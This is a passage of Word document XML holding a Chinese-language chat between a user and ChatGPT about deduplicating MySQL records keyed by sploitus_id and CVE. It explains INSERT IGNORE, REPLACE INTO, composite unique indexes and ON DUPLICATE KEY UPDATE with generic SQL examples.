        <w:t>设计一个新的唯一键，比如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id_CVE_key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这个键由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>共同组成。这样，只有当这两个字段同时重复的时候，才会被视为重复记录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAB7415" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E911CCC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在插入数据时，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句。如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> sploitus_id_CVE_key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经存在，数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>据库将忽略这条插入请求，并不会引发错误。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000AAFC8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35062DD3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种方式可以防止重复的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被插入，同时也无需执行额外的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作来检查</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CVE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是否已存在。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4918CAE6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572CB976" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意：使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时，如果发生任何错误，比如数据类型错误，都会被忽略。因此，你需要确保你的数据是准确和有效的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D3D0E3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E017951" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句差不多啊</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19980500" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78048C1E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618040CD" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> REPLACE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都可以用来处理重复的键，但它们的行为并不完全相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1042D384" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EB916AA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    REPLACE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在遇到重复键时，会先删除原有的行，然后插入新的行。如果你的表有其他的列并且你的插入语句没有提供这些列的值，那么这些列的值将被清除或设置为默认值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA75BF0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="287EDA7C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在遇到重复键时，会忽略当前的插入操作，保留原有的行。这意味着，如果你的表有其他列并且原有行中的值并不是默认值，那么这些值将会被保留。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259087C9" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B60176" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另外，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">INSERT IGNORE INTO </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也会忽略所有其他的错误，如数据类型不匹配等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4562E4BB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DEDC41B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>因此，这两个语句虽然都可以处理重复的键，但具体应该选择哪一个，需要根据你的实际需求来决定。如果你想保留原有行的其他列的值，应该选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> INSERT IGNORE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果你想用新行的值替换原有行的所有列的值，应该选择</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> REPLACE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25892869" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E00D81" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>replace into</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句能不能根据两个字段为是否唯一来插入数据？你给我推荐个其他思路？</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4372BAAC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237023CA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2019C4EA" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>REPLACE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句的行为是基于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PRIMARY KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNIQUE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>约束来决定的。换言之，它会在遇到与现有数据具有相同主键或唯一键值的新数据时删除原有行。因此，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>REPLACE INTO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>无法直接基于两个字段的唯一性来插入数据，除非你已经在这两个字段上定义了唯一键。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A41842" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4347E3" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你想要在两个字段都是唯一的情况下插入数据，可能需要使用其他方式。例如，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INSERT ... ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，这将允许你在主键或唯一键冲突时更新数据。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692993DF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B1ACBFE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E10C463" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSERT INTO table (sploitus_id, cve, content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744AE034" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>VALUES ('sploitus_id_value', 'cve_value', 'content_value')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77882DB6" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ON DUPLICATE KEY UPDATE content='content_value';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E4EA504" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1D54B4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个语句会尝试插入一行，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>两个字段的组合与现有行冲突（前提是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>你在这两个字段上定义了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNIQUE KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），那么它将更新那一行的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>字段。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02477DD2" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB2A182" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个可能的解决方案是使用数据库的存储过程或触发器来管理插入和更新的逻辑。这种方法通常更复杂，但是它提供了更大的灵活性，可以处理更复杂的逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEA9EE4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69DE772B" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后，有时候，你需要在代码中管理这些复杂的逻辑。在这种情况下，你可能需要先执行一个查询来查找是否已经存在具有给定</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sploitus_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cve</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>值的行，然后根据查询结果来决定是插入新行还是更新现有行。这可能需要多次访问数据库，但是它可以处理任意复杂的逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168EA230" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F0BEAF" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据两个不是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unique key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字段同时都在数据库是唯一的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D04911" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8FF701" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1103B570" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INSERT ... ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的语句，你可以使用它在插入新数据时，如果遇到一个冲突（因为重复的主键或者是唯一索引），那么就会更新相应的行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56543585" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7796131E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>但是这个语句需要一个前提：那就是你需要在需要检查的字段上设置唯一索引。即使这两个字段并不是单独的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNIQUE KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，你也可以创建一个多列的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNIQUE INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，它将会检查这两列数据的组合是否是唯一的。比如你可以这样创建一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UNIQUE INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53686400" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D148D0" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E33439" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ALTER TABLE your_table_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78572E51" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ADD UNIQUE INDEX `unique_index_on_two_columns` (`column1`, `column2`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4398E1CC" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B1B1910" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后，你就可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>INSERT ... ON DUPLICATE KEY UPDATE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399D5F5E" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656069D8" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC9755C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>INSERT INTO your_table_name (column1, column2, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A827DB" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>VALUES (value1, value2, ...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0DE9CE" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ON DUPLICATE KEY UPDATE column1 = value1, column2 = value2, ...;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCF573C" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705252A4" w14:textId="77777777" w:rsidR="00AD5612" w:rsidRDefault="00AD5612" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>column1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>column2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
